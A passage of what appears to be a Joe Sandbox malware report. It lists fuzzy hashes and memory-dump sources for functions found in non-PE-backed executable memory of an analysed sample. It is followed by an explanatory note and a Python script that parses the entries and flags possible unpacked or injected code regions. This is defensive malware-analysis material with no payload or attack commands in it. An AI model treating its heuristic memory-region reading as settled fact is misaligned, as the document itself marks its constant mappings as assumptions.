                                    • Instruction ID: 60c594fada52b0ccd399ec541d55fb8c8743bc3a97932b71580cf8ec55a66666
                                    • Opcode Fuzzy Hash: c2b619f497a684f9d39aa9cbcfeadc48708663d04aa2aa7908614a339ba34d39
                                    • Instruction Fuzzy Hash: 60317C30700345CFDB16DB38D5586ADB7B2AB49305F1444A8D906EB790EB3ADE45CBA1
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 04815870bed7933b0ab426d41138e4e349a037e5db19b6a2846a2cd6be744689
                                    • Instruction ID: 4a4f518dcbd7ef99095a9a0447b7dfda62dbabfcacad642a3800213da2c5c28c
                                    • Opcode Fuzzy Hash: 04815870bed7933b0ab426d41138e4e349a037e5db19b6a2846a2cd6be744689
                                    • Instruction Fuzzy Hash: 92318E30E0060A9BCB19CF69D5946AEB7B6FF89310F10C529E916E7350DB74ED42CB50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 15ecc6c1c39eae7ca591f4cb586c7445ac8aadd822235d7c4b78304e03d19129
                                    • Instruction ID: 887a4fba977657032ea8511aaefc262d9bae20c65c28e6a7dfe87362350fea16
                                    • Opcode Fuzzy Hash: 15ecc6c1c39eae7ca591f4cb586c7445ac8aadd822235d7c4b78304e03d19129
                                    • Instruction Fuzzy Hash: A441EFB0D003499FDB14DFA9C584ADEBFF5FF48310F248429E809AB254DB75AA85CB90
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c8f4f9f91d4edd15ab279e2acca3251afb8f0ac4ecda2a736282fed73a2daf76
                                    • Instruction ID: 51a5d656a1baa704cbb8e12bdf3e0e728f06b946c27a7f371699ad6cf0431a30
                                    • Opcode Fuzzy Hash: c8f4f9f91d4edd15ab279e2acca3251afb8f0ac4ecda2a736282fed73a2daf76
                                    • Instruction Fuzzy Hash: DA316C30700345CFDB15DB78D5586AD77B2AB49305F1004A8D906EB790DB3ADE45CBA2
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cde95f4c9eae2929b2bf76ce6131e0e816a0f00967c619a49904912603cfedbd
                                    • Instruction ID: f335cb764689006d09b19431b736724f4b497921f08aa98d8e99099bd95a77ff
                                    • Opcode Fuzzy Hash: cde95f4c9eae2929b2bf76ce6131e0e816a0f00967c619a49904912603cfedbd
                                    • Instruction Fuzzy Hash: 3031B130E0060A9BDB05CF69D49069EF7B6FF89314F10D619E805EB391DB70D942CB91
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eb91e97f386b5032413caf0f1b7975a6fae9f639a0c4381d087a0c1ff096dee8
                                    • Instruction ID: 62533dcaf61e1931b1665a1998f6419c1ea6226bf06c627a817d3ce64dde056b
                                    • Opcode Fuzzy Hash: eb91e97f386b5032413caf0f1b7975a6fae9f639a0c4381d087a0c1ff096dee8
                                    • Instruction Fuzzy Hash: BC213E34700215CFCB49EB78E45866D77ABFF88704B248468D40A8B3A9CE399C46CB96
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 31e7c702b808298076a18174e2d7901b44aedb7602b1364e9f256bece10d41e3
                                    • Instruction ID: 7becca0a3ddc441caa9e670aa1e26fb3d5fade3abe4d5f140327d5090c3707f9
                                    • Opcode Fuzzy Hash: 31e7c702b808298076a18174e2d7901b44aedb7602b1364e9f256bece10d41e3
                                    • Instruction Fuzzy Hash: 8E218230E0060A9BDB15CF69D49069EF7B6FF89314F10D619E805EB391DB70D942CB91
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7ad80004795e4f382af235b064d00fbb652ba7a6f772bdfceedd3b7a56bc88cf
                                    • Instruction ID: 1448ef189de999357379df19770c756aee975d99549368e50b4cb1a3b6b9d120
                                    • Opcode Fuzzy Hash: 7ad80004795e4f382af235b064d00fbb652ba7a6f772bdfceedd3b7a56bc88cf
                                    • Instruction Fuzzy Hash: 0D21A1706001018FDF12EB2CF98CB59776AEB49354F148A61D405CB66AEA3CED4ACBD1
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 74e849ccd8b57ce037fd9fb1d24b9e4230101bcdd269a7b33776723576754b1f
                                    • Instruction ID: 5b53dc0817c55b126b022d99ced420e0c917ec7cd7bee4108d78fdc9bd68d021
                                    • Opcode Fuzzy Hash: 74e849ccd8b57ce037fd9fb1d24b9e4230101bcdd269a7b33776723576754b1f
                                    • Instruction Fuzzy Hash: CE21B635E10209DBCB19DFA8C4506AEF7B2EF85324F10851AE825FB351DB70EA42CB51
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 824b855b430c0c119ee0d357c9dac2f489701985c959fb30a278649dd8f0e415
                                    • Instruction ID: fc7cdc17c09fd4371efa4c3184f8a311e78ce7f8889e6c75bc7fb3f3c26c4a6d
                                    • Opcode Fuzzy Hash: 824b855b430c0c119ee0d357c9dac2f489701985c959fb30a278649dd8f0e415
                                    • Instruction Fuzzy Hash: 4F212A30700205CFDB55DB78D559AAD7BF2EB49300B6440A8E506EB3A1EB36DE05CBA1
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3283658482.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_15ed000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6a8bcc0087f6c7d3b841ac30bf9130555293e82d713972688a03a6ed311ef93a
                                    • Instruction ID: 9a2d74957c761628659781f076ceb19499310a31590e1f24736e4fb7dc0243df
                                    • Opcode Fuzzy Hash: 6a8bcc0087f6c7d3b841ac30bf9130555293e82d713972688a03a6ed311ef93a
                                    • Instruction Fuzzy Hash: 9A210071A04204DFCB19DF68D988B26BFF5FB88314F28C969D90A0F256D33AD406CA61
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5bc800c9f776a00daa4c9427f97bae4c303506f2f30b3704477595eba5ff91a0
                                    • Instruction ID: 05395f36f102cf1f348bf15ce70082c847f5d8644c5258288e79e16763a7dcfb
                                    • Opcode Fuzzy Hash: 5bc800c9f776a00daa4c9427f97bae4c303506f2f30b3704477595eba5ff91a0
                                    • Instruction Fuzzy Hash: 4A21A2306012018BEF36672CF48C32C3662FB07325F10842AE50ACBB55DB2DDA858796
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d22d48f0d03028a1d4ccd9f35fdcf677d571387ccf82344fe3f2bbc4dba2fe76
                                    • Instruction ID: 16edb47873d37a5f1f9817e9d8fc9cef45860f94d364db12a3a56ca26e59325b
                                    • Opcode Fuzzy Hash: d22d48f0d03028a1d4ccd9f35fdcf677d571387ccf82344fe3f2bbc4dba2fe76
                                    • Instruction Fuzzy Hash: B321A730E10209DBCB15DFA9C4549AEF7B2EF89324F10851AE825FB341DB70E946CB51
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2dbfe7390f0c4aea78c4365e5581b07711fb4babfd06df21373a2bfd8f237fc3
                                    • Instruction ID: 004eacce3d553daa389a968ba389d0bd6d08adec04bec32008610f99aca7e73e
                                    • Opcode Fuzzy Hash: 2dbfe7390f0c4aea78c4365e5581b07711fb4babfd06df21373a2bfd8f237fc3
                                    • Instruction Fuzzy Hash: 0E214A30B00245CBEB25DB38C558AAD77F1AB49304F6045A9D116EBBA1DB35CE41CBA1
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4ba0765e244c7f8e61dda0c885750d6d6b0a0799be7a394aa01b256e3cb6f353
                                    • Instruction ID: 6fcbc5e9edd9369d0eee148a9c92c794e408f79b1c487f5c4273d9fcb330d1e5
                                    • Opcode Fuzzy Hash: 4ba0765e244c7f8e61dda0c885750d6d6b0a0799be7a394aa01b256e3cb6f353
                                    • Instruction Fuzzy Hash: 13210930B00309CFDB15DB78C569AAE77F6AB49704F6004A8D506EBBA0DB35DE41CBA1
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2def1caf67e9f48f32a41c287a8e4f5b134b23670b77f4791094228d76958066
                                    • Instruction ID: a77c0421fa470cc9a0fdd63be7bd6f0a3c9dbbde1097fe1cfd721ecf7a48ea07
                                    • Opcode Fuzzy Hash: 2def1caf67e9f48f32a41c287a8e4f5b134b23670b77f4791094228d76958066
                                    • Instruction Fuzzy Hash: C42151707001014FDF26EB6CF98CB597769EB49394F148A21D409CB66AEA3CED498BD1
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c8143c02a32f3236b235791b5a30263666126d81322fa03885681040f5c8f91d
                                    • Instruction ID: 577896c6d5ee0ef4f257ff0534cbc653704b9ff23f3931c934474768214cc667
                                    • Opcode Fuzzy Hash: c8143c02a32f3236b235791b5a30263666126d81322fa03885681040f5c8f91d
                                    • Instruction Fuzzy Hash: 3B212A30700205CFDB15DB78D558A9E77F6EB48300F604068E506EB3A1DB36DE04CBA1
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ec9f52e13e6dd2c4eb55b84d24c1eff80710aefb90c7519101e42af760940a9d
                                    • Instruction ID: 3c33d960aba1e54254a4520271dde471510900c0fd436d46bc190fde987c9e35
                                    • Opcode Fuzzy Hash: ec9f52e13e6dd2c4eb55b84d24c1eff80710aefb90c7519101e42af760940a9d
                                    • Instruction Fuzzy Hash: 8111C630B012048BEF659A7DE91437E3695EB87358F20893AF406CF342DA35CE458BC1
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 151ef5be46fee18f2b5daca433389cd7502b670f7d925d98cb4437fa94e18a96
                                    • Instruction ID: c76462c93c42caa375bd7c259a0ddcf22394c58bcf5978b18b9a6609cbc7f5d7
                                    • Opcode Fuzzy Hash: 151ef5be46fee18f2b5daca433389cd7502b670f7d925d98cb4437fa94e18a96
                                    • Instruction Fuzzy Hash: 2211A330B012088FEF659B7DE81472E3695EB46354F20497AF406CF392DA35CE858BC1
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3283658482.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_15ed000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6b3cc5269bec8a96fccac150a2e4a9ff70860651b73e2ed129a47ba98cfe5d01
                                    • Instruction ID: 254dfb741344112e61d0293b62c98a75742c827e83a9347fc92e8032bd78b848
                                    • Opcode Fuzzy Hash: 6b3cc5269bec8a96fccac150a2e4a9ff70860651b73e2ed129a47ba98cfe5d01
                                    • Instruction Fuzzy Hash: 4B219F755093808FDB07CF24D994715BFB1FB46214F28C5EAD8498F2A7C33A980ACB62
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8ed06e67a770fd6d2a2a1c9cafa0662379f0222d54856cbaa3ea7079c39ed627
                                    • Instruction ID: 1e04c9f9113892d465784fb90916582ae3dbc6f7a275599c3f05bf248a7a7087
                                    • Opcode Fuzzy Hash: 8ed06e67a770fd6d2a2a1c9cafa0662379f0222d54856cbaa3ea7079c39ed627
                                    • Instruction Fuzzy Hash: F711A1B6F013159BCB11AB78A84C66EBAE6FB48754F108526E909D3345EB38C90287D2
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8cda5801c1453d61a84a0488432dc732d403fe212a4638d0101cc594bbd16dc8
                                    • Instruction ID: 2cee17da1fd2440218ea7d4e044f96ef139d0eb3a22171ba81d3bf454eaabd86
                                    • Opcode Fuzzy Hash: 8cda5801c1453d61a84a0488432dc732d403fe212a4638d0101cc594bbd16dc8
                                    • Instruction Fuzzy Hash: A1118231A012158FCF21EFBC889429D7BF5EF49315B1400B9E905E7741E735DA41C7A2
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7c08482f15ec2a44fce9c3db8d574b673a6cbf2f0fc9245534c9cf655650f3fd
                                    • Instruction ID: 893bdb02c401db9c0562ea2f4eb3207bba196b2ada4efa69a1a7734517a9993d
                                    • Opcode Fuzzy Hash: 7c08482f15ec2a44fce9c3db8d574b673a6cbf2f0fc9245534c9cf655650f3fd
                                    • Instruction Fuzzy Hash: A5016D31A012158FCF21EFBC88841ADBBE5AB49314B14047AE905E7641E635EA41CBA2
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c3a4d45d8c94219d935b5ca0c88d6fd1b9293333939c5e84e476ecf8905852e5
                                    • Instruction ID: 3db606f842cbda76939eb1bf1f8edc4e1c4b452812e0d0c932f7b1adb31a8d05
                                    • Opcode Fuzzy Hash: c3a4d45d8c94219d935b5ca0c88d6fd1b9293333939c5e84e476ecf8905852e5
                                    • Instruction Fuzzy Hash: 6E112B30A001058FDB04EFA5DA9078ABB7AFF80320F14C135C80C5B359D774EA06C791
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 41f9e4838d943caf9f9bb8d50cc49b84c4b82e5b3edbf5fec56aed39671ece6d
                                    • Instruction ID: 530ea211aafc8cf0cb19348cd73a9a0d789cb8d721fa46d8568959557cf2a73d
                                    • Opcode Fuzzy Hash: 41f9e4838d943caf9f9bb8d50cc49b84c4b82e5b3edbf5fec56aed39671ece6d
                                    • Instruction Fuzzy Hash: 95012C31A00209DFCB45EFB8F94899D7BB9EF44308F1085BDC4059B266EB356E099B92
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9f53f6290cfb1215d1bc2064c15b57a9e571a1d3c959001db26eda633a5cd660
                                    • Instruction ID: 2c878a1ce4525fa3fe8de5555ea39ca91a9dfd1a364cf0741e01c4251335a82a
                                    • Opcode Fuzzy Hash: 9f53f6290cfb1215d1bc2064c15b57a9e571a1d3c959001db26eda633a5cd660
                                    • Instruction Fuzzy Hash: 22F02B33E041548BDB218BBC88D41ACBFA1FE65325B1D00D7D845EBA51D735D642C751
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b71998f70500cf116b557b0459060d8cc5686dfc324bf1b4f9ab6c79cc1dcd1a
                                    • Instruction ID: 543cad8c27ec9d88e734099326469b3804f4846a42723a19c816dc8cb74982b2
                                    • Opcode Fuzzy Hash: b71998f70500cf116b557b0459060d8cc5686dfc324bf1b4f9ab6c79cc1dcd1a
                                    • Instruction Fuzzy Hash: E0F03130A40109DFCB45EFB8F94499D7BB9EF44304F108579C4059B265EF346E099B91
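Nearly every function entry above is attributed to the same non-PE-backed dump at offset 01870000 in process index 3 (one entry comes from 015ED000), which is the usual picture for code that was unpacked or injected into a foreign process rather than loaded from the original image. The script below is an added example, not part of the Joe Sandbox report: it parses two of the entries above (copied as sample input), decodes the dotted .sdmp file name, groups the function fuzzy hashes by memory region and flags executable, private, non-PE-backed regions as unpacked-code candidates. The field layout assumed for the .sdmp name (process index, dump index, time, base, protection, type) and the reading of 0x40 as PAGE_EXECUTE_READWRITE and 0x20000 as MEM_PRIVATE are assumptions based on the Windows MEMORY_BASIC_INFORMATION constants; the report page does not document them.

```python
import re

# Sample input: two function records copied from the report's IDA-plugin
# listing (indentation removed). Everything below it is added example
# code, not Joe Sandbox's own.
REPORT_EXCERPT = """\
Memory Dump Source
• Source File: 00000003.00000002.3284573358.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1870000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ec9f52e13e6dd2c4eb55b84d24c1eff80710aefb90c7519101e42af760940a9d
• Instruction ID: 3c33d960aba1e54254a4520271dde471510900c0fd436d46bc190fde987c9e35
• Opcode Fuzzy Hash: ec9f52e13e6dd2c4eb55b84d24c1eff80710aefb90c7519101e42af760940a9d
• Instruction Fuzzy Hash: 8111C630B012048BEF659A7DE91437E3695EB87358F20893AF406CF342DA35CE458BC1
Memory Dump Source
• Source File: 00000003.00000002.3283658482.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_15ed000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6b3cc5269bec8a96fccac150a2e4a9ff70860651b73e2ed129a47ba98cfe5d01
• Instruction ID: 254dfb741344112e61d0293b62c98a75742c827e83a9347fc92e8032bd78b848
• Opcode Fuzzy Hash: 6b3cc5269bec8a96fccac150a2e4a9ff70860651b73e2ed129a47ba98cfe5d01
• Instruction Fuzzy Hash: 4B219F755093808FDB07CF24D994715BFB1FB46214F28C5EAD8498F2A7C33A980ACB62
"""

# ASSUMPTION: the dotted .sdmp name is read as
#   <process index>.<dump index>.<dump time>.<base>.<protect>.<unknown>.<type>.<unknown>
# with <protect> and <type> carrying MEMORY_BASIC_INFORMATION values.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXECUTABLE_PROTECT = {0x10, 0x20, 0x40, 0x80}  # the PAGE_EXECUTE* family

BULLET_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$", re.MULTILINE)
SOURCE_RE = re.compile(r"(\S+\.sdmp), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")


def parse_source_file(value):
    """Decode a 'Source File' value into dump metadata."""
    m = SOURCE_RE.match(value)
    if not m:
        raise ValueError("unrecognised Source File value: %r" % value)
    parts = m.group(1).split(".")
    protect = int(parts[4], 16)
    mem_type = int(parts[6], 16)
    return {
        "process_index": int(parts[0]),
        "dump_index": int(parts[1]),
        "base": int(parts[3], 16),
        "protect": protect,
        "protect_name": PAGE_PROTECT.get(protect, hex(protect)),
        "type_name": MEM_TYPE.get(mem_type, hex(mem_type)),
        "executable": protect in EXECUTABLE_PROTECT,
        "pe_backed": m.group(3) == "true",
    }


def parse_records(text):
    """Split the listing into one dict per function entry; empty bullets
    such as 'API ID:' are kept as empty strings."""
    records = []
    for chunk in text.split("Memory Dump Source")[1:]:
        fields = {k.strip(): v.strip() for k, v in BULLET_RE.findall(chunk)}
        rec = parse_source_file(fields["Source File"])
        rec["snapshot"] = fields.get("Snapshot File", "")
        rec["opcode_fuzzy_hash"] = fields.get("Opcode Fuzzy Hash", "")
        rec["instruction_fuzzy_hash"] = fields.get("Instruction Fuzzy Hash", "")
        records.append(rec)
    return records


def summarize(records):
    """Group functions by (process index, base) and flag regions that are
    executable, private and not backed by a PE: the usual home of an
    unpacked or injected payload."""
    summary = {}
    for rec in records:
        key = (rec["process_index"], rec["base"])
        entry = summary.setdefault(key, {
            "functions": 0, "instruction_hashes": [],
            "protect": rec["protect_name"], "type": rec["type_name"],
            "suspicious": False})
        entry["functions"] += 1
        entry["instruction_hashes"].append(rec["instruction_fuzzy_hash"])
        entry["suspicious"] = (rec["executable"] and not rec["pe_backed"]
                               and rec["type_name"] == "MEM_PRIVATE")
    return summary


if __name__ == "__main__":
    for (proc, base), entry in summarize(parse_records(REPORT_EXCERPT)).items():
        flag = "UNPACKED-CODE CANDIDATE" if entry["suspicious"] else "ok"
        print("process %d base 0x%08X %s %s: %d function(s) [%s]" % (
            proc, base, entry["protect"], entry["type"], entry["functions"], flag))
```

Run against the full listing, the same grouping gives a per-region function count and a list of instruction fuzzy hashes that can be pivoted on across other reports for the same family; the region flag is only a heuristic and should be read together with the injection and unpacking signatures at the top of the report.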